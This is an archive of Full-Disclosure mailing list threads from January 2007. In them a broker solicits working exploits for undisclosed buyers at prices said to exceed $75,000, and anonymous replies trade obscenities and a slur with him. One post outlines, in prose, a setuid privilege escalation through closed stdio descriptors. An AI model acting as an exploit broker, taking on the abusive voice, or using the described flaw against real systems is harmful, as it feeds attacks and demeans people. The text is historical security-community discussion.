Just wanted to let everyone know that I've updated the blog to reflect new changes. You can see the changes at http://snosoft.blogspot.com. On 1/18/07 2:27 PM, Simon Smith [EMAIL PROTECTED] wrote: Oh, About your ROI question, that varies per buyer. I am not usually told about why a buyer needs something as that's none of my business. On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED] wrote: Simon Smith escribió: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're naive I was wondering which kind of (legal) enterprises/organizations would pay $75000 for a simple (or not so simple) exploit. - governmental organizations (defense? DoD? FBI? ...) - firms offering high-profiled pen-testing services? - ... ? What about the ROI for such investment? /naive Regards, -Roman ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Multiple OS kernel insecure handling of stdio file descriptor
On 2007-Jan-18 22:21:52 +0800, XFOCUS Security Team [EMAIL PROTECTED] wrote: The affected OSes allows local users to write to or read from restricted files by closing the file descriptors 0 (standard input), 1 (standard output), or 2 (standard error), which may then be reused by a called setuid process that intended to perform I/O on normal files. the attack which exploit this vulnerability possibly get root right. This vulnerability has been known for years. OpenBSD implemented a kernel check to block this attack in 1998. FreeBSD and NetBSD have similar kernel checks and I believe glibc also has checks to block this. It is disturbing that none of the commercial OS vendors appear to have bothered to protect against this. -- Peter Jeremy pgpX6KSpU4drD.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
This is complete bullshit nothing more than a social engineering honey pot to get bugs and vulns for their own use, this company couldn't affort 75.ooo USD if they tried, they cannot even find their own bugs, they got 4 or 5 shitty reasearch and vuln findings of thier own, that's it. 75.000 for a remote vista ie7 xploit, guaranteed you wont find it and if you do they won't pay lose lose :( jigga yo Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
How do you know the vuln won't be re-sold? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Nobody ever said that 75,000.00 was a price for a remote vista bug. On 1/18/07 8:39 PM, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: This is complete bullshit nothing more than a social engineering honey pot to get bugs and vulns for their own use, this company couldn't affort 75.ooo USD if they tried, they cannot even find their own bugs, they got 4 or 5 shitty reasearch and vuln findings of thier own, that's it. 75.000 for a remote vista ie7 xploit, guaranteed you wont find it and if you do they won't pay lose lose :( jigga yo Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up to 75 for the same. YOUR WORDS FUCKFACE ST00PID LYING CUNT! I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. Re: [Full-disclosure] iDefense Q-1 2007 Challenge From: Simon Smith (simonsnosoft.com) Date: Tue Jan 16 2007 - 11:14:56 CST know someone who will pay significantly more per vulnerability against the same targets. On 1/10/07 12:27 PM, contributor Contributoridefense.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Also available at: http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerabi lity+chall enge *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in Vista IE 7.0* On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith [EMAIL PROTECTED] wrote: Nobody ever said that 75,000.00 was a price for a remote vista bug. On 1/18/07 8:39 PM, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: This is complete bullshit nothing more than a social engineering honey pot to get bugs and vulns for their own use, this company couldn't affort 75.ooo USD if they tried, they cannot even find their own bugs, they got 4 or 5 shitty reasearch and vuln findings of thier own, that's it. 75.000 for a remote vista ie7 xploit, guaranteed you wont find it and if you do they won't pay lose lose :( jigga yo Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Sure he did ivan... On 1/19/07 12:53 AM, Ivan . [EMAIL PROTECTED] wrote: 75.000 for a remote vista ie7 xploit, ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Roman and List, Let me address this issue once and for all, because the issue is really quite simple. I am offering security researchers the ability to have their exploits legally purchased for a price that is higher than the standard prices offered by the majority of third parties. The researchers who decide to participate will be sent a legally binding contract. This contract will specifically protect the researcher and buyer and clearly spell out the terms and conditions of business. And as for Roman's argument, I can assure him (and all of you) that the exploit code will be put to ethical, legitimate and legal use. The only people that will be using the exploit code are established U.S. based public or private sector corporations/parties. Other than that I am not going to get into a debate about it. Lastly, it amazes me that so many people complain about the prices that they sell their exploits for, then, when someone like me comes around to try to give them fair pricing in a legal way, they'd rather complain about that than take up the opportunity. This reminds me of old women who are always trying to find a reason to complain. Nothing more than a bunch of grumpy old women. ;] On 1/18/07 7:53 PM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED] wrote: Then you cannot assure that your buyer will make an ethical use of the exploit. So what's the real difference against selling it to another people (known or unknown, where unknown could be black-hats, script-kiddies or whoever making the higher bid)? The receipt? :) I mean, if I (as a researcher) don't mind what the exploit will be used for, I'd simply look for the higher bidder (I guess). And you didn't really answer my former two questions... Please, could you provide some specific examples of typical ways to justify ROI? Which is the typical profile/s of enterprise/s buying exploits? (without naming particular enterprises, of course). Simon Smith escribió: Oh, About your ROI question, that varies per buyer. I am not usually told about why a buyer needs something as that's none of my business. On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED] wrote: Simon Smith escribió: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're naive I was wondering which kind of (legal) enterprises/organizations would pay $75000 for a simple (or not so simple) exploit. - governmental organizations (defense? DoD? FBI? ...) - firms offering high-profiled pen-testing services? - ... ? What about the ROI for such investment? /naive Regards, -Roman ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Dear NoBalls, What specifically is a fuckface anyway and why are you hiding behind an anonymous email account? More importantly, my words were not: SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up to 75 for the same. Hell that sentence doesn't even make any sense! What the heck does much for up to 75 for the same even mean? My EXACT words were: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're interested contact me and we'll get the ball rolling. -Simon $8000.00 USD is low! -End of my words- ;] On 1/19/07 1:05 AM, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up to 75 for the same. YOUR WORDS FUCKFACE ST00PID LYING CUNT! I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. Re: [Full-disclosure] iDefense Q-1 2007 Challenge From: Simon Smith (simonsnosoft.com) Date: Tue Jan 16 2007 - 11:14:56 CST know someone who will pay significantly more per vulnerability against the same targets. On 1/10/07 12:27 PM, contributor Contributoridefense.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Also available at: http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerabi lity+chall enge *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in Vista IE 7.0* On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith [EMAIL PROTECTED] wrote: Nobody ever said that 75,000.00 was a price for a remote vista bug. On 1/18/07 8:39 PM, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: This is complete bullshit nothing more than a social engineering honey pot to get bugs and vulns for their own use, this company couldn't affort 75.ooo USD if they tried, they cannot even find their own bugs, they got 4 or 5 shitty reasearch and vuln findings of thier own, that's it. 75.000 for a remote vista ie7 xploit, guaranteed you wont find it and if you do they won't pay lose lose :( jigga yo Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Number one:
1. An affidavit from your soliciters or accountant's that
USD750.000 has ever been dispensed through your company or your
proxy company
2. An affidavit from your solictier's or accounttants, that you,
your so-called client (who is you sno shit) have ever paid out
upto 750.ooo usd {citing in some cases}
PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU TRIED.
PROOF EVERY ONE WRONG LOUD MOUTH.
On Fri, 19 Jan 2007 01:31:51 -0500 Simon Smith [EMAIL PROTECTED]
wrote:
Dear NoBalls,
What specifically is a fuckface anyway and why are you
hiding behind
an anonymous email account?
More importantly, my words were not:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for
up
to 75 for the same.
Hell that sentence doesn't even make any sense! What the heck does
much for
up to 75 for the same even mean?
My EXACT words were:
Amen!
KF is 100% on the money. I can arrange the legitimate purchase
of most
working exploits for significantly more money than iDefense, In
some cases
over $75,000.00 per purchase. The company that I am working with
has a
relationship with a legitimate buyer, all transactions are legal.
If you're
interested contact me and we'll get the ball rolling.
-Simon
$8000.00 USD is low!
-End of my words-
;]
On 1/19/07 1:05 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for
up
to 75 for the same. YOUR WORDS FUCKFACE
ST00PID LYING CUNT!
I can arrange the legitimate purchase of most
working exploits for significantly more money than iDefense, In
some cases
over $75,000.00 per purchase.
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
From: Simon Smith (simonsnosoft.com)
Date: Tue Jan 16 2007 - 11:14:56 CST
know someone who will pay significantly more per vulnerability
against the
same targets.
On 1/10/07 12:27 PM, contributor Contributoridefense.com
wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Also available at:
http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerab
i
lity+chall
enge
*Challenge Focus: Remote Arbitrary Code Execution
Vulnerabilities
in
Vista IE 7.0*
On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Nobody ever said that 75,000.00 was a price for a remote vista
bug.
On 1/18/07 8:39 PM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
This is complete bullshit nothing more than a social
engineering
honey pot to get bugs and vulns for their own use, this
company
couldn't affort 75.ooo USD if they tried, they cannot even
find
their own bugs, they got 4 or 5 shitty reasearch and vuln
findings of thier own, that's it.
75.000 for a remote vista ie7 xploit, guaranteed you wont find
it
and if you do they won't pay
lose lose :(
jigga
yo
Concerned about your privacy? Instantly send FREE secure
email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Concerned about your privacy? Instantly send FREE secure email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Concerned about your privacy? Instantly send FREE secure email, no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Dumbass, you must be a part of the n3td3v ccr3w or something.
How did you go from 75,000 to 750,000?
On 1/19/07 1:38 AM, [EMAIL PROTECTED] [EMAIL PROTECTED]
wrote:
Number one:
1. An affidavit from your soliciters or accountant's that
USD750.000 has ever been dispensed through your company or your
proxy company
2. An affidavit from your solictier's or accounttants, that you,
your so-called client (who is you sno shit) have ever paid out
upto 750.ooo usd {citing in some cases}
PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU TRIED.
PROOF EVERY ONE WRONG LOUD MOUTH.
On Fri, 19 Jan 2007 01:31:51 -0500 Simon Smith [EMAIL PROTECTED]
wrote:
Dear NoBalls,
What specifically is a fuckface anyway and why are you
hiding behind
an anonymous email account?
More importantly, my words were not:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for
up
to 75 for the same.
Hell that sentence doesn't even make any sense! What the heck does
much for
up to 75 for the same even mean?
My EXACT words were:
Amen!
KF is 100% on the money. I can arrange the legitimate purchase
of most
working exploits for significantly more money than iDefense, In
some cases
over $75,000.00 per purchase. The company that I am working with
has a
relationship with a legitimate buyer, all transactions are legal.
If you're
interested contact me and we'll get the ball rolling.
-Simon
$8000.00 USD is low!
-End of my words-
;]
On 1/19/07 1:05 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for
up
to 75 for the same. YOUR WORDS FUCKFACE
ST00PID LYING CUNT!
I can arrange the legitimate purchase of most
working exploits for significantly more money than iDefense, In
some cases
over $75,000.00 per purchase.
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
From: Simon Smith (simonsnosoft.com)
Date: Tue Jan 16 2007 - 11:14:56 CST
know someone who will pay significantly more per vulnerability
against the
same targets.
On 1/10/07 12:27 PM, contributor Contributoridefense.com
wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Also available at:
http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerab
i
lity+chall
enge
*Challenge Focus: Remote Arbitrary Code Execution
Vulnerabilities
in
Vista IE 7.0*
On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Nobody ever said that 75,000.00 was a price for a remote vista
bug.
On 1/18/07 8:39 PM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
This is complete bullshit nothing more than a social
engineering
honey pot to get bugs and vulns for their own use, this
company
couldn't affort 75.ooo USD if they tried, they cannot even
find
their own bugs, they got 4 or 5 shitty reasearch and vuln
findings of thier own, that's it.
75.000 for a remote vista ie7 xploit, guaranteed you wont find
it
and if you do they won't pay
lose lose :(
jigga
yo
Concerned about your privacy? Instantly send FREE secure
email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Concerned about your privacy? Instantly send FREE secure email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Concerned about your privacy? Instantly send FREE secure email, no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
typical con artist - worng focus FUCKFACE
PROOF YOUR BONA FIDES VIA .LAWYER OR .ACCUNTANT. EVEN ONE NICKEL
GIVEN FOR A VULN. LET ALONE 750 MILLION.
On Fri, 19 Jan 2007 01:42:43 -0500 Simon Smith [EMAIL PROTECTED]
wrote:
Dumbass, you must be a part of the n3td3v ccr3w or something.
How did you go from 75,000 to 750,000?
On 1/19/07 1:38 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
Number one:
1. An affidavit from your soliciters or accountant's that
USD750.000 has ever been dispensed through your company or your
proxy company
2. An affidavit from your solictier's or accounttants, that you,
your so-called client (who is you sno shit) have ever paid out
upto 750.ooo usd {citing in some cases}
PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU
TRIED.
PROOF EVERY ONE WRONG LOUD MOUTH.
On Fri, 19 Jan 2007 01:31:51 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Dear NoBalls,
What specifically is a fuckface anyway and why are you
hiding behind
an anonymous email account?
More importantly, my words were not:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much
for
up
to 75 for the same.
Hell that sentence doesn't even make any sense! What the heck
does
much for
up to 75 for the same even mean?
My EXACT words were:
Amen!
KF is 100% on the money. I can arrange the legitimate
purchase
of most
working exploits for significantly more money than iDefense, In
some cases
over $75,000.00 per purchase. The company that I am working
with
has a
relationship with a legitimate buyer, all transactions are
legal.
If you're
interested contact me and we'll get the ball rolling.
-Simon
$8000.00 USD is low!
-End of my words-
;]
On 1/19/07 1:05 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much
for
up
to 75 for the same. YOUR WORDS FUCKFACE
ST00PID LYING CUNT!
I can arrange the legitimate purchase of most
working exploits for significantly more money than iDefense,
In
some cases
over $75,000.00 per purchase.
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
From: Simon Smith (simonsnosoft.com)
Date: Tue Jan 16 2007 - 11:14:56 CST
know someone who will pay significantly more per vulnerability
against the
same targets.
On 1/10/07 12:27 PM, contributor Contributoridefense.com
wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Also available at:
http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerab
i
lity+chall
enge
*Challenge Focus: Remote Arbitrary Code Execution
Vulnerabilities
in
Vista IE 7.0*
On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Nobody ever said that 75,000.00 was a price for a remote
vista
bug.
On 1/18/07 8:39 PM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
This is complete bullshit nothing more than a social
engineering
honey pot to get bugs and vulns for their own use, this
company
couldn't affort 75.ooo USD if they tried, they cannot even
find
their own bugs, they got 4 or 5 shitty reasearch and vuln
findings of thier own, that's it.
75.000 for a remote vista ie7 xploit, guaranteed you wont
find
it
and if you do they won't pay
lose lose :(
jigga
yo
Concerned about your privacy? Instantly send FREE secure
email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-
charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Concerned about your privacy? Instantly send FREE secure
email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Concerned about your privacy? Instantly send FREE secure email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
Concerned about your privacy? Instantly send FREE secure email, no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
You're right... I'll start ignoring you now. ;)
On 1/19/07 1:50 AM, [EMAIL PROTECTED] [EMAIL PROTECTED]
wrote:
typical con artist - worng focus FUCKFACE
PROOF YOUR BONA FIDES VIA .LAWYER OR .ACCUNTANT. EVEN ONE NICKEL
GIVEN FOR A VULN. LET ALONE 750 MILLION.
On Fri, 19 Jan 2007 01:42:43 -0500 Simon Smith [EMAIL PROTECTED]
wrote:
Dumbass, you must be a part of the n3td3v ccr3w or something.
How did you go from 75,000 to 750,000?
On 1/19/07 1:38 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
Number one:
1. An affidavit from your soliciters or accountant's that
USD750.000 has ever been dispensed through your company or your
proxy company
2. An affidavit from your solictier's or accounttants, that you,
your so-called client (who is you sno shit) have ever paid out
upto 750.ooo usd {citing in some cases}
PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU
TRIED.
PROOF EVERY ONE WRONG LOUD MOUTH.
On Fri, 19 Jan 2007 01:31:51 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Dear NoBalls,
What specifically is a fuckface anyway and why are you
hiding behind
an anonymous email account?
More importantly, my words were not:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much
for
up
to 75 for the same.
Hell that sentence doesn't even make any sense! What the heck
does
much for
up to 75 for the same even mean?
My EXACT words were:
Amen!
KF is 100% on the money. I can arrange the legitimate
purchase
of most
working exploits for significantly more money than iDefense, In
some cases
over $75,000.00 per purchase. The company that I am working
with
has a
relationship with a legitimate buyer, all transactions are
legal.
If you're
interested contact me and we'll get the ball rolling.
-Simon
$8000.00 USD is low!
-End of my words-
;]
On 1/19/07 1:05 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much
for
up
to 75 for the same. YOUR WORDS FUCKFACE
ST00PID LYING CUNT!
I can arrange the legitimate purchase of most
working exploits for significantly more money than iDefense,
In
some cases
over $75,000.00 per purchase.
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
From: Simon Smith (simonsnosoft.com)
Date: Tue Jan 16 2007 - 11:14:56 CST
know someone who will pay significantly more per vulnerability
against the
same targets.
On 1/10/07 12:27 PM, contributor Contributoridefense.com
wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Also available at:
http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerab
i
lity+chall
enge
*Challenge Focus: Remote Arbitrary Code Execution
Vulnerabilities
in
Vista IE 7.0*
On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Nobody ever said that 75,000.00 was a price for a remote
vista
bug.
On 1/18/07 8:39 PM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
This is complete bullshit nothing more than a social
engineering
honey pot to get bugs and vulns for their own use, this
company
couldn't affort 75.ooo USD if they tried, they cannot even
find
their own bugs, they got 4 or 5 shitty reasearch and vuln
findings of thier own, that's it.
75.000 for a remote vista ie7 xploit, guaranteed you wont
find
it
and if you do they won't pay
lose lose :(
jigga
yo
Concerned about your privacy? Instantly send FREE secure
email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-
charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Concerned about your privacy? Instantly send FREE secure
email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Concerned about your privacy? Instantly send FREE secure email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
Concerned about your privacy? Instantly send FREE secure email, no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Of course you will, the companhy you sell to never found more
than 4 vulns in their existence.
You're the cheap sales man selling insurance, where's your
USD750.ooo vuln EXPERT VULN GUY ?
No where, and neither the shithole comany, which is yours, ever
passed even 1 UsD through your company if you can even call itthat;
RE-RESQUET. YOUR LAWYER NOTIFICATION ON HIS HEADED NOTE PAPER YOU
SUCCESSFULLHY TRANSACTED EVEN ONE DEAL IN THIS FRAIME,
RE-RE-REQUEST YOUR LAWYER OR ACCOUNTING THAT EVEN YOU OR YOUR ROXY
COMANY R THE COMPANY BEHIND IT EVEN HAS THE MEANS TO DELIVER
USD750.OOO AT ALL PER YOUR CLAIM AND PROMISE AS WRITEN BY YOU ON FD
STATING SO.
]
HYOUR FAILURE TO DO SO OR PROOF EITHER OR, WILL NULL AND VOID YOU
AND RECONFIRM YOU AND YOUR '[AFFLIATES]' ARE FRAUDS
On Fri, 19 Jan 2007 01:52:06 -0500 Simon Smith [EMAIL PROTECTED]
wrote:
You're right... I'll start ignoring you now. ;)
On 1/19/07 1:50 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
typical con artist - worng focus FUCKFACE
PROOF YOUR BONA FIDES VIA .LAWYER OR .ACCUNTANT. EVEN ONE NICKEL
GIVEN FOR A VULN. LET ALONE 750 MILLION.
On Fri, 19 Jan 2007 01:42:43 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Dumbass, you must be a part of the n3td3v ccr3w or something.
How did you go from 75,000 to 750,000?
On 1/19/07 1:38 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
Number one:
1. An affidavit from your soliciters or accountant's that
USD750.000 has ever been dispensed through your company or
your
proxy company
2. An affidavit from your solictier's or accounttants, that
you,
your so-called client (who is you sno shit) have ever paid
out
upto 750.ooo usd {citing in some cases}
PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU
TRIED.
PROOF EVERY ONE WRONG LOUD MOUTH.
On Fri, 19 Jan 2007 01:31:51 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Dear NoBalls,
What specifically is a fuckface anyway and why are you
hiding behind
an anonymous email account?
More importantly, my words were not:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much
for
up
to 75 for the same.
Hell that sentence doesn't even make any sense! What the heck
does
much for
up to 75 for the same even mean?
My EXACT words were:
Amen!
KF is 100% on the money. I can arrange the legitimate
purchase
of most
working exploits for significantly more money than iDefense,
In
some cases
over $75,000.00 per purchase. The company that I am working
with
has a
relationship with a legitimate buyer, all transactions are
legal.
If you're
interested contact me and we'll get the ball rolling.
-Simon
$8000.00 USD is low!
-End of my words-
;]
On 1/19/07 1:05 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much
for
up
to 75 for the same. YOUR WORDS FUCKFACE
ST00PID LYING CUNT!
I can arrange the legitimate purchase of most
working exploits for significantly more money than iDefense,
In
some cases
over $75,000.00 per purchase.
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
From: Simon Smith (simonsnosoft.com)
Date: Tue Jan 16 2007 - 11:14:56 CST
